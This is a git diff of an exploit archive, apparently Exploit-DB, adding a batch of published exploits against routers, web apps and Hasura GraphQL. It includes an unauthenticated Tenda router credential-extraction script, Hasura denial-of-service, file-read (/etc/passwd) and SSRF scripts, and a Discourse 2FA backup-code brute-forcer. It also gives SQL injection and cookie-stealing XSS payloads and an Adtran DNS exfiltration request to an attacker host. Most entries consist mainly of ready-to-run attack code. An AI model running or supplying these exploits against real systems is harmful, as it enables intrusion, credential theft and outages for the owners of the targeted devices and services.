diff --git a/exploits/hardware/remote/49782.py b/exploits/hardware/remote/49782.py new file mode 100755 index 000000000..630c123d4 --- /dev/null +++ b/exploits/hardware/remote/49782.py @@ -0,0 +1,169 @@ +# Exploit Title: Tenda D151 & D301 - Configuration Download (Unauthenticated) +# Date: 19-04-2021 +# Exploit Author: BenChaliah +# Author link: https://github.com/BenChaliah +# Vendor Homepage: https://www.tendacn.com +# Software Link: https://www.tendacn.com/us/download/detail-3331.html +# Versions: +# - D301 1.2.11.2_EN +# - D301 V2.0 50.22.1.8_EN +# - D151 V2.0 50.21.1.5_EN + + +# --- Description --- # + +# This exploits allows for the download of the current router config including the admin login, just by requesting {IP}/goform/getimage, +# you can also activate telnet service by requesting /goform/telnet. Telnet activation issue exists in many other tenda devices too. + +# --- Proof of concept --- # + + +import struct +import itertools +import random, sys +import requests +import base64 + + + +FETCH_CODE = "\x80\x0f\x07\xe7\x83i\xb0@v2\x9c\x8ef\x93y\xb8z" +ADMIN_LOG_CFG = {'AdminPassword': 'admin', 'SupportPassword': 'support'} + +CLEAR_CODE = 256 +END_OF_CODE = CLEAR_CODE + 1 + +MIN_WIDTH = 8 +DEFAULT_MIN_BITS = MIN_WIDTH + 1 +DEFAULT_MAX_BITS = 12 + + + + +def cmsDecoder(compressed_cfg): + _cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256)) + _cp_dict[CLEAR_CODE] = CLEAR_CODE + _cp_dict[END_OF_CODE] = END_OF_CODE + prefix, offset, ignore = None, 0, 0 + codepoints_arr, remainder, bits = [], [], [] + + init_csize = len(_cp_dict) + + codesize = init_csize + minwidth = MIN_WIDTH + while (1 << minwidth) < codesize: + minwidth = minwidth + 1 + pointwidth = minwidth + + buts_arr = [] + for b in compressed_cfg: + value = struct.unpack("B", b)[0] + for bitplusone in range(8, 0, -1): + bitindex = bitplusone - 1 + buts_arr.append(1 & (value >> bitindex)) + + for nextbit in buts_arr: + offset = (offset + 1) % 8 + if ignore > 0: + ignore = ignore - 1 + continue + bits.append(nextbit) + if len(bits) == pointwidth: + cp_int = 0 + lsb_first = [b for b in bits] + lsb_first.reverse() + for bit_index in range(len(lsb_first)): + if lsb_first[bit_index]: + cp_int = cp_int | (1 << bit_index) + + bits = [] + codepoints_arr.append(cp_int) + codesize = codesize + 1 + if cp_int in [CLEAR_CODE, END_OF_CODE]: + codesize = init_csize + pointwidth = minwidth + else: + while codesize >= (2 ** pointwidth): + pointwidth = pointwidth + 1 + if cp_int == END_OF_CODE: + ignore = (8 - offset) % 8 + + + decodedBytes = [] + for cp_int in codepoints_arr: + + suffix = "" + if cp_int == CLEAR_CODE: + _cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256)) + _cp_dict[CLEAR_CODE] = CLEAR_CODE + _cp_dict[END_OF_CODE] = END_OF_CODE + prefix = None + + elif cp_int != END_OF_CODE: + if cp_int in _cp_dict: + suffix = _cp_dict[cp_int] + if None != prefix: + _cp_dict[len(_cp_dict)] = prefix + suffix[0] + else: + suffix = prefix + prefix[0] + _cp_dict[len(_cp_dict)] = suffix + prefix = suffix + decoded = suffix + for char in decoded: + decodedBytes.append(char) + return decodedBytes + + + + + + +def exploit(ip): + print "[!] Downloading config" + try: + r = requests.get("http://{}/goform/getimage".format(ip)) + pass + except: + print "[-] Failed to download the config, the target may not be vulnerable" + + BIN_CONTENT = r.content + BIN_CONTENT = BIN_CONTENT[BIN_CONTENT.index(FETCH_CODE):][:16*50] + + CONFIG_XML = b"".join(cmsDecoder(BIN_CONTENT)) + + USER_, PASS_ = "", "" + for i in ADMIN_LOG_CFG.keys(): + if i in CONFIG_XML: + CONFIG_XML = CONFIG_XML[CONFIG_XML.index(i) + len(i) + 1:] + PASS_ = CONFIG_XML[:CONFIG_XML.index(' + +
+ + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/hardware/webapps/49785.txt b/exploits/hardware/webapps/49785.txt new file mode 100644 index 000000000..6abf74b6b --- /dev/null +++ b/exploits/hardware/webapps/49785.txt @@ -0,0 +1,57 @@ +# Exploit Title: Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS) +# Date: 1/21/2021 +# Exploit Author: 3ndG4me +# Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home +# Version: v10.8.1 +# Tested on: NetVanta 7060 and NetVanta 7100 +# CVE : CVE-2021-25679 + +# CVE-2021-25679 - Adtran Personal Phone Manager Authenticated Stored XSS in Change Email Address Form + +--Summary-- + +The AdTran Personal Phone Manager software is vulnerable to an authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research + +ADTRAN, Inc +https://adtran.com + +--Affects-- + +- AdTran Personal Phone Manager +- Verified on v10.8.1 +- **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended impacted users update to an actively supported appliance. + +--Details-- + +The AdTran Personal Phone Manager software is vulnerable to an authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. These issues work by passing in a basic XSS payload to vulnerable POST parameters that are rendered in the output without saniztization. Since the forms do require authentication to access these issues cannot be exploited without credentials. This can allow for several issues including but not limited to: + +- Hijacking another user's session +- Modifying a user's configuration settings +- Using XSS payloads to capture input (keylogging) + +-- Proof of Concept -- +The following form was impacted and can be exploited with the sample payloads provided below: +- https://example.com/userapp/userSettingsAction.html + - POST + - formAction=changeEmailAddress&emailAddress=+data%22%3E%3Cscript%3Ealert%`document.cookie`60%3C%2Fscript%3E+&emailAddress2=&emailApply=Apply+Changes + +The vulnerable parameters that were identified are: +- emailAddress +- emailAddress2 + +--Mitigation-- + +Sanitize any user controlled input in both form fields and URL paramaters to properly encode data so it is not rendered as arbitrary HTML/JavaScript. + +--Timeline-- + +- 1/21/2021: XSS Vulnerability was discovered and documented. A temporary CVE identifier was requested by MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90 day disclosure timeline was established in the initial communication. +- 1/22/2021: Placeholder CVE-2021-25679 was assigned by MITRE. +- 1/29/2021: A response from AdTran's Product Security Team was received. +- 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted so a request was made to resend the data. +- 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The reasearcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such AdTran would not be invesitgating the issues leaving the details of the findings as is. The reseacher responded with acknowledgement to the decision and requested support to proceed with full disclosure outside of the previously established 90 day timeline. +- 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not procceed with disclosure until further notice. +- 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details. +- 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed. +- 3/3/2021: The researcher begins constructing a private repository to prepare the write ups for release. +- 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details. \ No newline at end of file diff --git a/exploits/hardware/webapps/49786.txt b/exploits/hardware/webapps/49786.txt new file mode 100644 index 000000000..85a020c1f --- /dev/null +++ b/exploits/hardware/webapps/49786.txt @@ -0,0 +1,62 @@ +# Exploit Title: Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS) +# Date: 1/21/2021 +# Exploit Author: 3ndG4me +# Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home +# Version: v10.8.1 +# Tested on: NetVanta 7060 and NetVanta 7100 +# CVE : CVE-2021-25680 + +# CVE-2021-25680 - Adtran Personal Phone Manager Multiple Reflected XSS + +--Summary-- + +The AdTran Personal Phone Manager software is vulnerable to multiple reflected cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research + +ADTRAN, Inc +https://adtran.com + +--Affects-- + +- AdTran Personal Phone Manager +- Verified on v10.8.1 +- **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended impacted users update to an actively supported appliance. + +--Details-- + +The AdTran Personal Phone Manager software is vulnerable to multiple reflected cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. These issues work by passing in a basic XSS payload to vulnerable GET parameters that are reflected in the output without saniztization. This can allow for several issues including but not limited to: + +- Hijacking a user's session +- Modifying a user's configuration settings +- Using XSS payloads to capture input (keylogging) + + +-- Proof of Concept -- +The following URL parameters were impacted and can be exploited with the sample payloads provided below: +- https://example.com/userapp/userSettings.html?emailSuccessMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E +- https://example.com/userapp/phoneSettings.html?successMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E +- https://example.com/userapp/phoneSettingsAction.html?formAction=&callForwardingFlag=1&callForwardNumber=SOMEDATA">&apply=Apply Changes +- https://example.com/userapp/directoriesAction.html?formAction=applySpeedDialChanges&callEntryToDelete=&newSpeedDialName(1)=&newSpeedDialNumber(1)=&newSpeedDialName(2)=&newSpeedDialNumber(2)=&newSpeedDialName(3)=&newSpeedDialNumber(3)=&newSpeedDialName(4)=&newSpeedDialNumber(4)=&newSpeedDialName(5)=&newSpeedDialNumber(5)=&newSpeedDialName(6)=&newSpeedDialNumber(6)=&newSpeedDialName(7)=&newSpeedDialNumber(7)=&newSpeedDialName(8)=&newSpeedDialNumber(8)=&newSpeedDialName(9)=&newSpeedDialNumber(9)=&newSpeedDialName(10)=&newSpeedDialNumber(10)=&newSpeedDialName(11)=&newSpeedDialNumber(11)=&newSpeedDialName(12)=&newSpeedDialNumber(12)=SOMEDATA&newSpeedDialName(13)=&newSpeedDialNumber(13)=&newSpeedDialName(14)=&newSpeedDialNumber(14)=&newSpeedDialName(15)=&newSpeedDialNumber(15)=&newSpeedDialName(16)=&newSpeedDialNumber(16)=&newSpeedDialName(17)=&newSpeedDialNumber(17)=&newSpeedDialName(18)=&newSpeedDialNumber(18)=&newSpeedDialName(19)=&newSpeedDialNumber(19)=&newSpeedDialName(20)=&newSpeedDialNumber(20)=&applySpeedDialChanges=Apply + +The vulnerable parameters that were identified impact more pages than just the above. Any page that renders a response using the following parameters is impacted by this issue: +- emailSuccessMessage +- successMessage +- callForwardNumber +- newSpeedDialNumber(#) + + +--Mitigation-- + +Sanitize any user controlled input in both form fields and URL paramaters to properly encode data so it is not rendered as arbitrary HTML/JavaScript. + +--Timeline-- + +- 1/21/2021: XSS Vulnerabilities were discovered and documented. A temporary CVE identifier was requested by MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90 day disclosure timeline was established in the initial communication. +- 1/22/2021: Placeholder CVE-2021-25680 was assigned by MITRE. +- 1/29/2021: A response from AdTran's Product Security Team was received. +- 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted so a request was made to resend the data. +- 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The reasearcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such AdTran would not be invesitgating the issues leaving the details of the findings as is. The reseacher responded with acknowledgement to the decision and requested support to proceed with full disclosure outside of the previously established 90 day timeline. +- 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not procceed with disclosure until further notice. +- 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details. +- 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed. +- 3/3/2021: The researcher begins constructing a private repository to prepare the write ups for release. +- 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details. \ No newline at end of file diff --git a/exploits/hardware/webapps/49787.txt b/exploits/hardware/webapps/49787.txt new file mode 100644 index 000000000..14487e94d --- /dev/null +++ b/exploits/hardware/webapps/49787.txt @@ -0,0 +1,55 @@ +# Exploit Title: Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration +# Date: 1/21/2021 +# Exploit Author: 3ndG4me +# Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home +# Version: v10.8.1 +# Tested on: NetVanta 7060 and NetVanta 7100 +# CVE : CVE-2021-25681 + +# CVE-2021-25681 - AdTran Personal Phone Manager DNS Exfiltration + +--Summary-- + +The AdTran Personal Phone Manager software is vulnerable to an issue that allows for exfiltration of data over DNS. This could allow for exposed AdTran Personal Phone Manager web servers to be used as DNS redirectors to tunnel arbitrary data over DNS. + +ADTRAN, Inc +https://adtran.com + +--Affects-- + +- AdTran Personal Phone Manager +- Verified on v10.8.1 +- **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended impacted users update to an actively supported appliance. + +--Details-- + +The AdTran Personal Phone Manager software is vulnerable to an issue that allows for exfiltration of data over DNS. This could allow for exposed AdTran Personal Phone Manager web servers to be used as DNS redirectors to tunnel arbitrary data over DNS. This is achieved by simply making a GET request to the vulnerable server containing a reference to a DNS target that is collecting the tunneled data. This can lead to: + +- Utilizing exposed AdTran Personal Phone Manager Services as a redirector for DNS based Command and Control +- Utilizing exposed AdTran Personal Phone Manager Services as a redirector for DNS based arbitrary data exfiltration + + +-- Proof of Concept -- +To exploit the issue all that is necessary is a simple DNS request: + +GET http://mydns.attack.com/ HTTP/1.1 +Host: SOME ADTRAN HOST HERE +Pragma: no-cache +Cache-Control: no-cache, no-transform +Connection: close + +--Mitigation-- +The server should be reconfigured to not perform arbitrary DNS lookups when the Host/Get requests do not match. Additionally scoping requests to only be allowed in the context of the application is ideal. + +--Timeline-- + +- 1/21/2021: DNS Exfiltration vulnerability was discovered and documented. A temporary CVE identifier was requested by MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90 day disclosure timeline was established in the initial communication. +- 1/22/2021: Placeholder CVE-2021-25681 was assigned by MITRE. +- 1/29/2021: A response from AdTran's Product Security Team was received. +- 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted so a request was made to resend the data. +- 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The reasearcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such AdTran would not be invesitgating the issues leaving the details of the findings as is. The reseacher responded with acknowledgement to the decision and requested support to proceed with full disclosure outside of the previously established 90 day timeline. +- 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not procceed with disclosure until further notice. +- 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details. +- 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed. +- 3/3/2021: The researcher begins constructing a private repository to prepare the write ups for release. +- 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details. \ No newline at end of file diff --git a/exploits/multiple/dos/49789.py b/exploits/multiple/dos/49789.py new file mode 100755 index 000000000..031913b78 --- /dev/null +++ b/exploits/multiple/dos/49789.py @@ -0,0 +1,50 @@ +# Exploit Title: Hasura GraphQL 1.3.3 - Denial of Service +# Software: Hasura GraphQL +# Software Link: https://github.com/hasura/graphql-engine +# Version: 1.3.3 +# Author: Dolev Farhi +# Date: 4/19/2021 +# Tested on: Ubuntu + +import sys +import requests +import threading + +HASURA_SCHEME = 'http' +HASURA_HOST = '192.168.1.1' +HASURA_PORT = 80 +THREADS = 300 + +def create_table(): + data = {"type":"bulk","args":[{"type":"run_sql","args":{"sql":"CREATE TABLE \"public\".\"test_db\"(\"test\" text NOT NULL, PRIMARY KEY (\"test\") );","cascade":False,"read_only":False}},{"type":"add_existing_table_or_view","args":{"name":"test_db","schema":"public"}}]} + endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) + r = requests.post(endpoint, json=data) + return r + +def insert_row(): + bomb = 'A' * 100000 + data = {"type":"insert","args":{"table":{"name":"test_db","schema":"public"},"objects":[{"test":bomb}],"returning":[]}} + endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) + r = requests.post(endpoint, json=data) + return r + +def DoS(): + dups = 'test \n ' * 1000000 + data = {'query': 'query { test_db { ' + dups + '} }'} + endpoint = '{}://{}:{}/v1/graphql'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) + r = requests.post(endpoint, json=data) + return r + +if not create_table().ok: + print('something went wrong, could not create table.') + sys.exit(1) + +if not insert_row().ok: + print('something went wrong, could not insert row') + sys.exit(1) + +while True: + for _ in range(THREADS): + print('Starting') + t = threading.Thread(target=DoS, args=()) + t.start() \ No newline at end of file diff --git a/exploits/multiple/webapps/49780.py b/exploits/multiple/webapps/49780.py new file mode 100755 index 000000000..7ca497d80 --- /dev/null +++ b/exploits/multiple/webapps/49780.py @@ -0,0 +1,70 @@ +# Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass +# Date: 14/01/2021 +# Exploit Author: Mesh3l_911 +# Vendor Homepage: https://www.discourse.org/ +# Software Link:https://github.com/discourse/discourse +# Version: Discourse 2.7.0 +# CVE: CVE-2021-3138 + +import requests + +username = input("\n input ur username : ") +password = input("\n input ur password : ") +session=requests.session() + +proxies = [] +def proxies(): + proxies_path = input("\n input ur proxies path : ") + + with open(proxies_path, 'r') as prox: + for _ in prox.read().splitlines(): + proxies.append() + +backup_codes = [] +def backup_list(): + Backup_codes = input("\n input ur Backup_codes list path : ") + + with open(Backup_codes, 'r') as codes: + for _ in codes.read().splitlines(): + backup_codes.append() + +def exploit(): + with open('Backup_codes.txt', 'w') as results: + try: + for __ in proxies: + for _ in codes.read().splitlines(): + header =\ + { + "X-CSRF-Token": "ur X-CSRF-Token", + "Cookie": "ur Cookie", + "X-Requested-With": "XMLHttpRequest" + } + body = {"login": username, "password": password, "second_factor_token": _, "second_factor_method": "2"} + request = session.post("ur target_url", headers=header, data=body, proxies={'http': __, 'https':__}) + source = request.text + backup_codes.remove(_) + + if request.status_code == 200: + if '"id"' in source: + results.write("The Backup_Coude is > {} ".format(_)) + return True + else: + pass + else: + proxies.remove(__) + break + + + except requests.exceptions.SSLError and requests.exceptions.ConnectionError: + print(" Connection Failed :( ") + + results.close() + + +def main(): + if exploit(): + print("\n Found :) \n") + else: + print("\n Please re-check ur inputs :( \n") +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/49790.py b/exploits/multiple/webapps/49790.py new file mode 100755 index 000000000..d8e1db784 --- /dev/null +++ b/exploits/multiple/webapps/49790.py @@ -0,0 +1,29 @@ +# Exploit Title: Hasura GraphQL 1.3.3 - Local File Read +# Software: Hasura GraphQL +# Software Link: https://github.com/hasura/graphql-engine +# Version: 1.3.3 +# Exploit Author: Dolev Farhi +# Date: 4/19./2021 +# Tested on: Ubuntu + +import requests +import sys + +HASURA_SCHEME = 'http' +HASURA_HOST = '192.168.1.1' +HASURA_PORT = 80 +READ_FILE = '/etc/passwd' + +def LFI(file): + SQLI = "SELECT pg_read_file('../../../../../../../../../{}',0,1000);".format(file) + data = {"type":"bulk","args":[{"type":"run_sql","args":{"sql":SQLI,"cascade":False,"read_only":False}}]} + endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) + r = requests.post(endpoint, json=data) + return r.json() + +res = LFI(READ_FILE) + +try: + print(res[0]['result'][1][0]) +except: + print(res) \ No newline at end of file diff --git a/exploits/multiple/webapps/49791.py b/exploits/multiple/webapps/49791.py new file mode 100755 index 000000000..5657669bb --- /dev/null +++ b/exploits/multiple/webapps/49791.py @@ -0,0 +1,55 @@ +# Exploit Title: Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF) +# Software: Hasura GraphQL +# Software Link: https://github.com/hasura/graphql-engine +# Version: 1.3.3 +# Exploit Author: Dolev Farhi +# Date: 4/19/2021 +# Tested on: Ubuntu + +import requests + +HASURA_SCHEME = 'http' +HASURA_HOST = '192.168.1.1' +HASURA_PORT = 80 + +REMOTE_URL = 'http://some_remote_addr' + +def SSRF(url): + data = { + "type":"bulk", + "args":[ + { + "type":"add_remote_schema", + "args":{ + "name":"test", + "definition":{ + "url":url, + "headers":[], + "timeout_seconds":60, + "forward_client_headers":True + } + } + } + ] + } + endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) + r = requests.post(endpoint, json=data) + return r.json() + +res = SSRF(REMOTE_URL) + +message = '' +raw_body = '' + +try: + if 'message' in res['internal']: + message = res['internal'].get('message', '') + if 'raw_body' in res['internal']: + raw_body = res['internal'].get('raw_body', '') +except: + pass + +print('Remote URL: ' + REMOTE_URL) +print('Message: ' + message) +print('HTTP Raw Body: ' + raw_body) +print('Error: ' + res['error']) \ No newline at end of file diff --git a/exploits/php/webapps/49154.py b/exploits/php/webapps/49154.py index a5654d435..64c6afbe9 100755 --- a/exploits/php/webapps/49154.py +++ b/exploits/php/webapps/49154.py @@ -5,7 +5,7 @@ # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip # Version: 3.1.3 # Tested on: Ubuntu 16.04 -# CVE : N/A +# CVE : CVE-2020-35313 # WonderCMS is vulnerable to SSRF Vulnerability. # In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS. diff --git a/exploits/php/webapps/49155.py b/exploits/php/webapps/49155.py index 3c55f42ed..755730db6 100755 --- a/exploits/php/webapps/49155.py +++ b/exploits/php/webapps/49155.py @@ -5,7 +5,7 @@ # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip # Version: 3.1.3 # Tested on: Ubuntu 16.04 -# CVE : N/A +# CVE : CVE-2020-35314 # WonderCMS is vulnerable to Authenticated Remote Code Execution. diff --git a/exploits/php/webapps/49665.txt b/exploits/php/webapps/49665.txt index c34423e41..6763641bf 100644 --- a/exploits/php/webapps/49665.txt +++ b/exploits/php/webapps/49665.txt @@ -1,4 +1,4 @@ -# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) +# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) # Date: 2021-03-17 # Exploit Author: Murat ŞEKER # Vendor Homepage: https://www.rconfig.com diff --git a/exploits/php/webapps/49777.txt b/exploits/php/webapps/49777.txt new file mode 100644 index 000000000..00bc15800 --- /dev/null +++ b/exploits/php/webapps/49777.txt @@ -0,0 +1,55 @@ +# Exploit Title: Fast PHP Chat 1.3 - 'my_item_search' SQL Injection +# Date: 15/04/2021 +# Exploit Author: Fatih Coskun +# Vendor Homepage: https://codecanyon.net/item/fast-php-chat-responsive-live-ajax-chat/10721076 +# Version: 1.3 +# Category: Webapps +# Tested on: Kali linux +# Description : The vulnerability allows an attacker to inject sql commands from search section with 'my_item_search' parameter. +==================================================== + +# PoC : SQLi : + +POST /chat/edit.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://localhost/chat/edit.php +Cookie: PHPSESSID=9a04fe702b8ff82c1199590d7c286e1c; +_ga=GA1.2.1275939122.1527132107; _gid=GA1.2.1709883568.1527132107 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 40 +my_item_search=test&submit_search=Search + + +Parameter : my_item_search + + Type : boolean-based blind + Demo : https://localhost/chat/edit.php + Payload : my_item_search=-2454' OR 6122=6122#&submit=Search + + Type : error-based + Demo : https://localhost/chat/edit.php + Payload : my_item_search=test' AND (SELECT 3274 FROM(SELECT +COUNT(*),CONCAT(0x71706a7071,(SELECT +(ELT(3274=3274,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hbeW&submit=Search + + Type : stacked queries + Demo : https://localhost/chat/edit.php + Payload : my_item_search=test';SELECT SLEEP(5)#&submit=Search + + Type : AND/OR time-based blind + Demo : https://localhost/login-script-demo/users.php + Payload : my_item_search=test' OR SLEEP(5)-- mlod&submit=Search + + Type : UNION query + Demo : https://localhost/chat/edit.php + Payload : my_item_search=test' UNION ALL SELECT +NULL,CONCAT(0x71706a7071,0x4c5a6241667667676e4f6658775348795675704b557871675a5542646273574e5359776668534a71,0x7162716b71),NULL,NULL,NULL,NULL#&submit=Search + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/49778.txt b/exploits/php/webapps/49778.txt new file mode 100644 index 000000000..0e21e3020 --- /dev/null +++ b/exploits/php/webapps/49778.txt @@ -0,0 +1,20 @@ +# Exploit Title: WordPress Plugin RSS for Yandex Turbo 1.29 - Stored Cross-Site Scripting (XSS) +# Date: 17/04/2021 +# Exploit Author: Himamshu Dilip Kulkarni +# Software Link: https://wordpress.org/plugins/rss-for-yandex-turbo/ +# Version: 1.29 +# Tested on: Windows + +#Steps to reproduce vulnerability: + +1. Install WordPress 5.6 +2. Install and activate "RSS for Yandex Turbo" plugin. +3. Navigate to Setting >> Яндекс.Турбо >> Счетчики and enter the data into all the six user input field and submit the request. +4. Capture the request into burp suite and append the following mentioned JavaScript payloads (one payload per parameter) +"+onmouseover="alert(1) +"+onmouseover="alert(2) +"+onmouseover="alert(3) +"+onmouseover="alert(4) +"+onmouseover="alert(5) +"+onmouseover="alert(6) +5. You will observe that the payloads got successfully stored into the database and when you move the mouse cursor over these fields the JavaScript payloads get executed successfully and we get a pop-up. \ No newline at end of file diff --git a/exploits/php/webapps/49779.txt b/exploits/php/webapps/49779.txt new file mode 100644 index 000000000..90bb91523 --- /dev/null +++ b/exploits/php/webapps/49779.txt @@ -0,0 +1,18 @@ +# Exploit Title: BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS) +# Date: 04/07/2021 +# Exploit Author: Ömer Hasan Durmuş +# Vendor Homepage: https://blackcat-cms.org/ +# Software Link: https://blackcat-cms.org/page/download.php +# Version: BlackCat CMS - 1.3.6 + +Step 1 : Login to admin account in http://TARGET/backend/start/index.php +Step 2 : Then click on the "Addons" +Step 3 : Click on "Create new" +Step 4 : Input "" in the field "Module / language name" +Step 5 : Update or visit new page. + +Step 1 : Login to admin account in http://TARGET/backend/start/index.php +Step 2 : Then click on the "Access" +Step 3 : Click on "Manage groups" +Step 4 : Input "" in the field "Group name" and click "Add group" +Step 5 : Update or visit new page. \ No newline at end of file diff --git a/exploits/php/webapps/49781.py b/exploits/php/webapps/49781.py new file mode 100755 index 000000000..37f9f8682 --- /dev/null +++ b/exploits/php/webapps/49781.py @@ -0,0 +1,97 @@ +# Exploit Title: RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS) +# Exploit Author: nu11secur1ty +# Debug: g3ck0dr1v3r +# Date: 04/21/2021 +# Vendor Homepage: https://remoteclinic.io/ +# Software Link: https://github.com/remoteclinic/RemoteClinic +# CVE: CVE-2021-30044 + +[+] Exploit Source: +https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-30044 + +[Exploit Program Code] + +#!/usr/bin/python3 +# Author: @nu11secur1ty +# Debug: g3ck0dr1v3r +# CVE-2021-30044 + +from selenium import webdriver +import time + + +#enter the link to the website you want to automate login. +website_link="http://localhost/RemoteClinic/login/" + +#enter your login username +username="admin@domain.ext" + +#enter your login password +password="remoteclinic" + +#enter the element for username input field +element_for_username="user_id" +#enter the element for password input field +element_for_password="password" +#enter the element for submit button +element_for_submit="submit" + +# Dai brauzura aaa ta eba +browser = webdriver.Chrome() #uncomment this line,for chrome users +#browser = webdriver.Firefox() #uncomment this line,for chrome users +#browser = webdriver.Safari() #for macOS users[for others use chrome vis +chromedriver] + +# Otvarai da ne vlazam s kasata +browser.get((website_link)) + +# Run... +try: +username_element = browser.find_element_by_name(element_for_username) +username_element.send_keys(username) +password_element = browser.find_element_by_name(element_for_password) +password_element.send_keys(password) + +### Login +signInButton = browser.find_element_by_name(element_for_submit) +signInButton.click() + +### Exploit +element_for_natrutvanie="submit" +browser.get(("http://localhost/RemoteClinic/staff/register.php")) + +### Inner text... +browser.execute_script("document.querySelector('[name=\"first_name\"]').value += ''") +browser.execute_script("document.querySelector('[name=\"last_name\"]').value += ''") +browser.execute_script("document.querySelector('[name=\"userid\"]').value = +'nu11secur1ty@gmail.com'") +browser.execute_script("document.querySelector('[name=\"passkey\"]').value += 'password'") 